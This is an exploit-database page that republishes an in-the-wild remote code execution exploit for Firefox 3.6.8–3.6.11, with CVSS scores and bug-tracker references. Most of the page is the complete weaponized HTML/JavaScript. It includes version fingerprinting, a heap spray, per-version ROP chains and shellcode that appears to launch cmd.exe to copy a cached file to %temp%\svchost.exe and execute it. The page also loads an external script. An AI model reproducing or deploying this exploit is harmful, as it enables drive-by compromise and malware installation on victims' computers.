Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)

2010.11.03
Credit: unknown
Risk: High
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- WARNING! This is exploit code from the wild. The original first 2 unicode chars at 'id=sun8' were ub8acu1029. Use, as always, at your own risk. <body> <div style="visibility:hidden;width:0px;height:0px"> <div id=sun8>uccccuccccu0d00u0d0du0d00u102du1000u0d00u102du1000u102du1000u2853u1000u0011u0000u116cu1000u0300u7ffeub459u1002u6b99u1000ub333udeaduffffuffffu57a8u13e8u0000u0000u57a0u13e8u1000u0000u0040u0000u2853u1000u0001u0000u2853u1000u0000u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1af1u1000u57a8u13e8u116cu1000u57a8u13e8ub459u1002</div> <div id=sun9>uef52u100auef52u100auef52u100auef52u100auef52u100auef52u100auef51u100au0011u0000u5500u1001u0300u7FFEud761u1004uff9cu1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000uef51u100au0001u0000uef51u100au0000u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001uce22u1003u57A8u0d78u5500u1001u57A8u0d78ud761u1004</div> <div id=sun10>uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u0011u0000u1FC7u1052u0300u7FFEuFD6Du1001uA173u1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u20F0u1011u0001u0000u20F0u1011u0000u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u9405u1003u57A8u0d78u1FC7u1052u57A8u0d78uFD6Du1001</div> <div id=sun11>u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc7u1000u0011u0000u827fu1000u0300u7FFEucda3u1000u6689u1000uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u4bc7u1000u0001u0000u4bc7u1000u0000u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000</div> <div id=suv>uEC81u0120u0000uFC8BuC783uC704u3207u9174uC70Cu0447u138EuAC0Au47C7u3908u7DE2uC783u0C47u65A0uCB97u47C7u9310uE432uC794u1447uD550uCB9Bu47C7u4318uACBEuC7DBu1C47u36B2u130Fu47C7uC420u1F8DuC774u2447u2F51u01A2u47C7u5728u0D66uC7FFu2C47u879BuE58Bu47C7uED30uFFAFuC7B4u3447u19C2u014Bu47C7u7D38uA5F0uC79Au3C47u2BE4uC594u47C7uEC40u5F9DuC7A4u4447uD680u9AAFu8DE9u0000u3300u64C0u30A1u0000u8B00u0C40u408Bu8B14u8B00u8B00u1040uE88BuF78Bu116AuE859u0027u0000uF9E2u6DEBu8B5Bu6AEEu5300u55FFu6424u00A1u0000uC700u0440u0000u0000u00C7u0000u0000u00B8u0000uFF00u51E0u8B56u3C75u748Bu782EuF503u8B56u2076uF503uC933u4149u03ADu33C5u0FDBu10BEuD63Au0874uCBC1u0307u40DAuF1EBu1F3BuE775u8B5Eu245EuDD03u8B66u4B0Cu5E8Bu031Cu8BDDu8B04uC503u5EABuC359u6EE8uFFFFuE8FFuFF8EuFFFFu6D63u2E64u7865u2065u632Fu4620u524Fu2F20u2052u2522u5355u5245u5250u464Fu4C49u2545u4C5Cu636Fu6C61u5320u7465u6974u676Eu5C73u7041u6C70u6369u7461u6F69u206Eu6144u6174u4D5Cu7A6Fu6C69u616Cu465Cu7269u6665u786Fu505Cu6F72u6966u656Cu5C73u2022u6925u4920u204Eu2A28u2029u4F44u6920u2066u7E25u697Au6520u7571u2020u3834u3436u2030u6320u646Du652Eu6578u2F20u2063u6F63u7970u2220u6925u2022u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u2022u792Fu2620u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u0022uffffuffffuffffuffff</div> </div> <body> <script src=scvhost.txt></script> <script type="text/javascript"> function check(){ var temp=""; var user=navigator.userAgent.toLowerCase(); var a=user.indexOf("windows nt 6.1"); var b=user.indexOf("windows nt 6.0"); var c=user.indexOf("firefox/3.6.8"); var d=user.indexOf("firefox/3.6.9"); var e=user.indexOf("firefox/3.6.10"); var f=user.indexOf("firefox/3.6.11"); if(a==-1&&b==-1&&c!=-1&&d==-1&&e==-1&&f==-1){ temp="8"; } else if(a==-1&&b==-1&&c==-1&&d!=-1&&e==-1&&f==-1){ temp="9"; } else if(a==-1&&b==-1&&c==-1&&d==-1&&e!=-1&&f==-1){ temp="10"; } else if(a==-1&&b==-1&&c==-1&&d==-1&&e==-1&&f!=-1){ temp="11"; } else { return temp="0"; } return temp; } function de(su){ var i;var sun = ""; for (i = 0; i < su.length; i++){ sun += String.fromCharCode(parseInt(su[i], 16)); } return unescape(sun); } function code(beastk){ var nop = ""; var len = beastk.length; for (i = 0; i < len;) { nop = nop + "m" + beastk.substring(i, i + 5); i = i + 5; } nop = nop.split("m").toString(); var temp = new Array(); for (j = 0; j < nop.length; j++) { if (nop.charCodeAt(j).toString(16) == "2c") { temp.push("25"); } else { temp.push(nop.charCodeAt(j).toString(16)); } } return de(temp); } function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } var ck=check(); var bk="mp.ojsyex5"; var array = new Array(); var ls = 0x100000-(bk.length*2+0x01020); var b1 ="";//////////////////////111111111111111111111111111111 if (ck == "0") { location.href = "about:blank"; } else { if(ck=="8"){ b1=code("u0d0du0d0d"); } if(ck=="9"){ b1=code("uef52u100a"); } if(ck=="10"){ b1=code("ub8b7u1029"); } if(ck=="11"){ b1=code("u4bc8u1000"); } var b = b1; while (b.length < (0x85750 - 0x1000) / 2) { b += b1 }; ///////////////////////////////2222222222222222222 var sun=""; var sun8 = document.getElementById("sun8").innerHTML; var sun9 = document.getElementById("sun9").innerHTML; var sun10 = document.getElementById("sun10").innerHTML; var sun11 = document.getElementById("sun11").innerHTML; var suv = document.getElementById("suv").innerHTML; if(ck=="8"){ sun=sun8; } if(ck=="9"){ sun=sun9; } if(ck=="10"){ sun=sun10; } if(ck=="11"){ sun=sun11; } b += code(sun + suv); for (u = 0; u < 8; u++) { b1 += b1; } while (b.length < ls) { b += b1; } var lh = b.substring(0, ls / 2); b = ""; for (i = 0; i < 0x200; i++) { array[i] = lh + bk; } ////////////////////////////////////333333333333 if(ck=="8"){ b1=code("ub8a7u1029"); } if(ck=="9"){ b1=code("uab07u1006"); } if(ck=="10"){ b1=code("u8247u1009"); } if(ck=="11"){ b1=code("uf7e7u1017"); } for (i = 0; i < 16; i++) { b1 += b1; } b = b1; while (b.length < ls) { b += b1; } lh = b.substring(0, ls / 2); b = ""; for (i = 0x200; i < 0x500; i++) { array[i] = lh + bk; } var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) for (i = 0; i < tags.length; i++) { var atts = getatts(tags[i]); for (j = 0; j < atts.length; j++) { var html = "<" + tags[i] + " " + atts[j] + "=a></" + tags[i] + ">" + tags[i]; document.write(html); } } } </script>-->

References:

https://bugzilla.redhat.com/show_bug.cgi?id=646997
https://bugzilla.mozilla.org/show_bug.cgi?id=607222#c53
https://bugzilla.mozilla.org/show_bug.cgi?id=607222
http://www.norman.com/security_center/virus_description_archive/129146/
http://www.norman.com/about_norman/press_center/news_archive/2010/129223/
http://isc.sans.edu/diary.html?storyid=9817
http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top